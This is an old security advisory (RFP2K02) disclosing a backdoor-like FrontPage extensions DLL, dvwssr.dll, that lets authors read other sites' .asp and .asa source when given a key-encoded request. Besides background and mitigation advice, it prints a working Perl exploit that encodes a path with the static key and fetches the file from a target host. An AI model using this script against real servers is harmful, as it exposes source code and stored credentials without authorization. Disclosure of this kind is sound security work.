RFP2K02.txt

`----- UMBRA Advisory RFP2K02 -------------------------- rfp.labs ---------  
  
"Netscape engineers are weenies!"  
A back door in Microsoft FrontPage extensions/authoring components  
  
------------------------------------- Alf Serer / [email protected]  
- rain forest puppy / [email protected]  
  
Table of contents:  
  
-1. The short  
-2. The long  
-3. The code  
  
--------------------------------------------------------------------------  
  
"...we love a good conspiracy theory as much as the next person..."  
- [email protected]  
  
--------------------------------------------------------------------------  
UMBRA UMBRA UMBRA UMBRA UMBRA UMBRA UMBRA UMBRA UMBRA UMBRA UMBRA UMBRA  
--------------------------------------------------------------------------  
  
  
--[ 1. The short  
  
The NT 4 Option Pack ships with a particular ISAPI .dll in  
/_vti_bin/_vti_aut/ named dvwssr.dll, which is mixed in with the Microsoft  
FrontPage extensions (the version I have is 3.0.2.1105). This particular  
.dll allows you to read .asp (and .asa) files under the web root,  
providing you know the 'password' (obfuscated encoding scheme) of which to  
ask it. And, as implied by the title, the constant key used in the  
encoding is "Netscape engineers are weenies!".  
  
I've been told that dvwssr.dll is a component of the NT 4 Option Pack, to  
be used with InterDev 1.0. Therefore deleting it will affect InterDev  
1.0's 'View Links' function. Also, the default permissions don't allow  
for anonymous users to use the .dll--however, anyone with web authoring  
can, and I've seen few sites that have allowed permission (which is more  
due to a misconfiguration on their part). As Microsoft has told me, the  
immediate problem is moreso the fact that any developer of one particular  
virtual site can download the .asp code of other virtual sites on the same  
system.  
  
--[ 2. The long  
  
In the fairly recent light of Mr. Cuartango's finding of a backdoor in the  
authentication of Microsoft installation packages, Microsoft  
([email protected] actually) stated to Bugtraq that the automatic  
acceptance of Microsoft packages is to "improve our customers' experience  
while downloading software from Microsoft web sites."  
  
Well, so let me relate how Microsoft has included an ISAPI .dll as part of  
the FrontPage extension package/Option Pack/Visual Interdev, to "improve a  
hacker's experience while downloading software from your web site".  
  
I was contacted by Alf Serer ([email protected]), who indicated to me  
that dvwssr.dll looked like it was a backdoor, and that it contained the  
string 'Netscape engineers are weenies!'(although, it's found backwards in  
the .dll). Being the curious pup that I am, I decided to take a look.   
Using some prior research code attempts at cracking the encoding algorithm  
(herein referred to as the 'weenie algorithm'), I used a test ISAPI app  
Alf sent to figure out what the hell this thing was for, and what it is  
supposed to do. Searches on Microsoft's site said it was to 'verify  
URLs'. However, I could not find any references to it elsewhere, and even  
decompilation of the various FrontPage extension applications, FrontPage  
clients, and Interdev clients yeilded no calls or references to dvwssr.dll  
that I could see; however, I was later told that Interdev 1.0 requies this  
.dll. Microsoft's site had dvwssr.dll down on the manifest for various  
FrontPage packages/installations.  
  
So, taking a peek at the .dll versions, I see that the other ISAPI .dlls  
that make up the core of FrontPage extensions are of version 3.0.2.1105,  
while dvwssr.dll is only 1.00.00.2503A. I would think that to mean it was  
recently introduced into the pack by Microsoft (if you don't know,  
FrontPage was an original program developed by Vemeer Technologies Inc;  
hence the _vti_ prefixes.) Granted, maybe it's possible that Vemeer  
engineers coded dvwssr.dll; but that means, upon acquisition, MS engineers  
left it in there. You would think some sort of Q&A and/or audit would  
catch it if it already existed...  
  
I'm not going to get into the exact details of the weenie encoding  
algorithm--after all, you have the code below. It's basically a 62  
character slide-rule type of encoding.  
  
Luckily, from my auditing, this is not included with any other versions of  
FrontPage (including Unix), and in the versions I found it on, ACLs  
prevented its use (only System and Administrators were allowed full  
access); I was told by MS that only individuals with web authoring  
permission can use it, which is more than I had originally thought. But  
it's not as widespread as, say, RDS. ;)  
  
Regardless of it's actual purpose, or Microsoft's intent, I think the core  
interesting issue is that Microsoft literally coded (or allowed) a .dll  
who used a static key such as 'Netscape engineers are weenies!'.  
  
In any event, if you don't use Interdev 1.0, you can delete the file and  
call it a day. If you do use Interdev 1.0, well, it's your call, but I  
suggest an upgrade.  
  
--[ 3. The code  
  
#!/usr/bin/perl  
# dvwssr.pl by rain forest puppy (only tested on Linux, as usual)  
#  
# Usage: dvwssr.pl target_host /file/to/retrieve/source  
#  
use Socket;  
  
$ip=$ARGV[0];  
$file=$ARGV[1];  
  
print "Encoding to: ".encodefilename($file)."\n";  
$url="GET /_vti_bin/_vti_aut/dvwssr.dll?".encodefilename($file)." HTTP/1.0\n\n";  
print sendraw($url);  
  
sub encodefilename {  
my $from=shift;  
my $slide="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";  
#  
#  
  
my $key="Netscape engineers are weenies!";  
  
#  
#  
my $kc=length($from);  
my ($fv,$kv,$tmp,$to,$lett);  
@letts=split(//,$from);  
foreach $lett (@letts){  
$fv=index $slide, $lett;   
$fv=index $slide, (substr $slide,62-$fv,1) if($fv>=0);  
$kv=index $slide, substr $key, $kc, 1;  
if($kv>=0 && $fv>=0){  
$tmp= $kv - $fv;  
if($tmp <0){$tmp +=62;}  
$to.=substr $slide, $tmp,1; } else {  
$to.=$lett;}  
if(++$kc >= length($key)){ $kc=0;}  
}return $to;}  
  
sub sendraw {  
my ($pstr)=@_;  
my $target;  
$target= inet_aton($ip) || die("inet_aton problems");  
socket(S,2,1,getprotobyname('tcp')||0) || die("Socket problems\n");  
if(connect(S,pack "SnA4x8",2,80,$target)){  
select(S); $|=1;  
print $pstr; my @in=<S>;  
select(STDOUT); close(S);  
return @in;  
} else { die("Can't connect...\n"); }}  
  
  
  
--[ 4. The End  
  
I know this is short and not with it's usual flare. I apologize...I have  
been running around like mad, and basically don't have the time or energy  
to expend into this. :/  
  
- rain forest puppy  
  
Special thanks to Alf Serer, the founder of this bug; also, special thanks  
to attrition.org (especially McIntyre) for helping me wrangle this. I'm  
currently in the UK, so if you have immediate questions, I suggest you  
send an email to Alf or the Attrition staff ([email protected]).  
  
Catch me, along with Fyodor, Ron Gula, Ken Williams, Theo DeRaadt, Mary  
Roesch, and others, at CanSecWest, May 10-12 in Vancouever, Canada. More  
info at www.dursec.com.  
  
  
------------------------------------- Alf Serer / [email protected]  
- rain forest puppy / [email protected]  
  
Regardless if Netscape engineers are weenies, Microsoft engineers  
are definately pompous   
  
----- UMBRA Advisory RFP2K02 -------------------------- rfp.labs ---------  
  
  
  
`